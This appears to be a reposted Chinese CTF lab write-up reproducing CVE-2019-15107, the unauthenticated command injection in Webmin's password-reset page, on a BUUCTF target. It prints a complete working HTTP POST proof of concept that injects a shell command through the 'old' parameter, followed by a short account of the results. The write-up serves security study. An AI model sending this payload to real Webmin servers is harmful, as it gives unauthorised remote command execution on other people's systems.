【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

发布时间:2022-07-04 发布网站:脚本宝典
脚本宝典收集整理的这篇文章主要介绍了【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。

漏洞简介

webmin 是一个用于管理类 Unix 系统的管理配置工具,具有 Web 页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令

漏洞靶场

BUUCTF 的 Real 分类下,[Webmin]CVE-2019-15107 模块。

【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

复现过程

直接进入提示内容如下:

【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

在 URl 地址栏前面增加 https:// 即可:

【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

使用 BurpSuITe 对该页面进行抓包,将数据包发送到 RePEater,然后使用下面的 POC:

POST /password_change.cgi HTTP/1.1
Host: node4.buuoj.cn:28720
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://node4.buuoj.cn:28720/session_login.cgi
Content-type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&PAM=&expired=2&old=test|id&new1=test2&new2=test2

注意:将 Host 和 Referer 中的地址更改为自己的实际地址。

在返回包中发现了内容:

【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

使用 pwd 命令,查看当前所在的目录:

【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

遇到的问题 在尝试向目录中写入 phpinfo 后,无法通过 URL 加载出页面,并且还尝试了手动翻看目录查找 flag,也都没有找到,只能作罢。

脚本宝典总结

以上是脚本宝典为你收集整理的【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现全部内容,希望文章能够帮你解决【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现所遇到的问题。

如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。